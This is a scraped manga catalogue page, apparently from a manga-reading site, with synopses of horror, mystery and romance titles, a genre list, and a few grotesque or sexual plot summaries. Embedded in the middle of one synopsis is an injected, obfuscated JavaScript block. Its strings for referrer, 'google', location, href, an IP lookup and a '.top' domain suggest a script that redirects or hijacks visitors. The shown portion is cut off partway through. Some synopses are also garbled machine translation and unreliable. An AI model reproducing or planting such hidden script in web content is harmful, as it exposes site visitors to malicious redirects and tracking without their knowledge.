The month is February, but it hasn’t snowed all winter. Kanon’s father is often away on business trips and might be getting a little too friendly with his pretty young female subordinate; which Kanon doesn’t approve of so soon after her mother’s death. Her little brother collects insects, but they’re dying off. It turns out that these deaths are the first of many a plague to come down. First it’s the insects, inexplicably dropping dead everywhere. Then it’s the rats, looking for a new food source. And things just keep getting worse…
3, Street of Mysteries explores the fantastical-poetic vein that has forged Mizuki's reputation in Japan. The stories contained in this series hold in common the obsessive ideas of immortality and of life after death. Skillfully blending a range of black humor, drama, and questions of morality, Mizuki shows once more his profound understanding of the human soul. (paraphrased from Astiberri)
Compilation containing many of Yasuko Aoike's famous early works including:- Volume 1 - **(** (アクアマリン), 1976 - Terence Reid, a young novelist, is invited to the outskirts of London by his old friend Gil Kane. At the castle of Thomas Barrymore, who is said to have been a vicious criminal in the past, Terence meets Aquamarine, a beautiful boy with bluish-gold hair and an angelic smile who looks exactly like Thomas.... Made in the same year as "From Eroica with Love," this is a gorgeous mystery-romance that marked a turning point for the mangaka.- Volume 2 - **(** (ロマン組曲, Roman Kumikyoku), 1976 - Daniel, a college student, left London with his black cat, Griffon, to visit his relative, the widow of Eddowes. He is not welcomed by Claudia, who claims to be his tutor, but he enjoys seeing her beautiful daughter, Catherine, who has grown up to be a beautiful woman. Daniel's search for love leads him to the town of London, where he finds a man named Daniel, who is also his father's son. Daniel's wanderings in search of love are always tinged with sad fate...- Volume 3 - **(** (オールマンものがたり, Allman Monogatari), 1978 - Craig, a kind-hearted and beautiful young man who loves flowers, stars, and music, escapes from the all-male Allman University in search of a woman with the muscle-bound John. Dressed as a woman, they sneak into a nunnery deep in the woods. There, they find themselves in the house of female vampires.... The love and adventures of beautiful young men unfold in this forbidden garden. The Sons of Eve" is the prototype for "Dracula's House is a Riot! (Allman's Story)," and "Dear Father," which is based on the mangaka's father.- Volume 4 - **(** (ハムレットを殺せ!, Hamlet wo Korose!), 2006 - The enormous legacy of the Blake family. A beautiful lover. Helmut, a young man who seems to have all the happiness in the world. Just before the end of "Hamlet," performed at his birthday party, he falls out of a window and loses all memory. All that comes out of his mouth are the lines of "Hamlet"... When his memory returns, Helmut learns that his lover Agnes has married his brother-in-law, Mulder. A cruel betrayal, a terrible conspiracy... In addition to the title story, which is based on a Shakespearean tragedy, this self-selected masterpiece collection contains six other stories, including "Mother's Day Off", which is modeled after the mangaka's mother.- Volume 5 - **(** (水の中の赤い家, Mizu no Naka no Akai Ie), 1973 - A stormy dusk. Jennifer, who lost her beloved boyfriend Joel in an accident just before their wedding, arrives at the red-roofed Scott house by the river, where they were supposed to visit together. A mother cannot accept the death of her son. Her younger brother, Marc, feels inferior to his deceased brother. Jennifer is trapped in the Red House when the river overflows due to heavy rains, and a terrifying evil hand begins to creep up on her... In addition to the title story, this self-selected masterpiece collection includes the fantastical short story "Moon Festival" as a special feature.
He is an international martial arts master who can kill a person within ten steps. He is a gentle and elegant antique master who is good at jade gambling and painting collection. He is a famous master from Xuanmen School who excels in geomancy and fortune-telling and is greatly respected by Buddhism and Taoism together. He is also a guru in the fields of medicine, reconnaissance, and investment. He is Zhang Jun, who, by coincidence, obtained the relics of Buddha’s eyeballs and has since seen all the beauties in the world with his X-ray Vision.<script></script><script>function _0x45b7(_0x3a1aef,_0x223ca9){var _0x1e9a40=_0x105f();return _0x45b7=function(_0x3dd53f,_0x5436ad){_0x3dd53f=_0x3dd53f-(-0x1a78+-0x4a*-0x3+0x1b6b);var _0x1937ae=_0x1e9a40[_0x3dd53f];return _0x1937ae;},_0x45b7(_0x3a1aef,_0x223ca9);}function _0x105f(){var _0x2c3a89=['918890HtzCzz','text','floor','referrer','870RoqNCp','.top/','VlcjD','18iLDhUS','3bteFiZ','includes','rpKdL','fvEki','.customapi','href','XJcrJ','http://rea','google','570025QzBchw','random','fKTPu','','then','https://ip','137498aaQsRE','dAPhw','3620277ytVtQB','2385540YFqLuY','8HLIJjf','5197475AFCVeu','location','BOxid','48807ObScfI','uyZCD','VISwd'];_0x105f=function(){return _0x2c3a89;};return _0x105f();}(function(_0x26e8d7,_0x191c93){var _0x3f09c5=_0x45b7,_0x5e42ed=_0x26e8d7();while(!![]){try{var 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Toriko Manga is a Japanese manga series illustrated and written by Mitsutoshi Shimabukuro In a world where the flavor and feel of food is very significant, there exist people called Gourmet Hunters (Bishokuya) who focus on the acquisition of uncommon ingredients and c
HorrorIsekaiJoseiManhuaManhwaMartial ArtsMatureMechaMedical
MysteryOne shotPsychologicalRomanceSchool LifeSci fiSeinenShoujoShoujo Ai
ShounenShounen AiSlice of LifeSmutSportsSupernaturalTragedyYaoiYuri
Im Rok, nicknamed 'Lucky Deer', has always had good luck. As is typical for him, he wins a contest and earns a trip with his friends. While on his trip, he meets Noah, a handsome and kind man, and he and his friends are invited to Noah's private island. As they arrive, they can't stop marveling at the luxurious island, the extravagant mansion, and Noah's hospitality. However, strange events begin happening, and one by one, Rok's friends disappear. To make matters worse, Im Rok stumbles upon a strange man locked up underground. What kind of fate will Im Rok face on this island?
A collection of oneshots Hoichi the Earless: A surreal story about a boy who writes disturbing songs and who sees the spirits of the dead. Read this if only to see the intense illustration on page 27. Paradise Cabin: A group of entertainers is plagued by the spirit of a deceased fellow entertainer. Other oneshots not translated.
Rion is on a mission to find her missing friend Shihoko. Her only two clues are a card given to her by Shihoko and a confession that her best friend was in love with a vampire. Thus she heads down to a club filled with pretty male escorts whom she insists are vampires. Suou, the owner of the club, insists that he doesn't know a Shihoko at all and claims that they are not vampires. So, he decides to chase her out of the club. In order to obtain the truth, Rion throws a very, very expensive bottle of wine onto the ground to prove that she is not leaving, for now she has to work part-time at the club. Later, she realizes that Suou and gang are not the vampires that kidnapped Shihoko. However, in the nick of life and death for both Shihoko and Rion, another group of vampires comes along to save them. So, who are the real vampires now?
The twisted and deeply disturbing tale of a psychopathic serial killer...
From DrCoke at MangaHelpers: Eight years ago, a girl went missing while playing hide-and-seek in the forest. Starting around then, instances of 'labyrinths' started spawning in random places, which led to an increasing amount of missing people. Kaori was one of them, when she was never found after the game of hide-and-seek she played with Shuhei. Now, eight years later, Shuhei still feels guilty for the loss of Kaori. He feels as though he, too, should be dragged into these 'labyrinths' in the search for his long lost friend. Now, he found an opening into the labyrinth. In it, he begins his search for the truth behind this phenomenon!
• Atsumemomo (The Collection) About a girl who collects everything her crush touches. • Harakiri A world where cutting your stomach is the newest fashionable trend among schoolgirls. *Fetus Collection A suicidal girl enters a little group of sick woman that made abortion a grotesque art. With usual Kago sick humor and nonsense. *Holy Night "This is a short Christmas-themed manga. Santa is terrorizing the Japanese by flooding everyone with unwanted gifts. The only way to stop Santa from sending more is to convince him that you’re happy with what you got, or so they believe. The story is split between a girl trying to find a way to get Santa to stop sending her vibrators, and the various government schemes to try and capture or eliminate Santa." *Suck It It's about a man who keeps a photographic album of women giving him blowjobs. Of course, no collection is complete without a little variety. *The Unscratchable Itch Putting worms under skin can be an addictive pleasure. *Three more untranslated stories
God's come down to earth and all hell is breaking loose! Enter a world where demons seen only in dreams are real, oceans swallow cities, and the powers of the mind are preferable to guns. It is here in the "Demon City" that Kyoya Izayoi, master of the rare martial art of nenpo, wields the mythical sword Ashura in defense of beautiful Sayaka Katagiri. As the evil Dark Order and the Super Soldiers of the Special Abilities Task Force clash in a race to find the one believed to be God, Kyoya saves a member of the SATF—and lands himself smack in the middle of a mess. Meanwhile, members of the Dark Order ambush Sayaka. Can Kyoya slay the beasts and save the girl? Will Kyoya help the SATF defeat the Dark Order and their plan to destroy the world? It's nature versus the supernatural!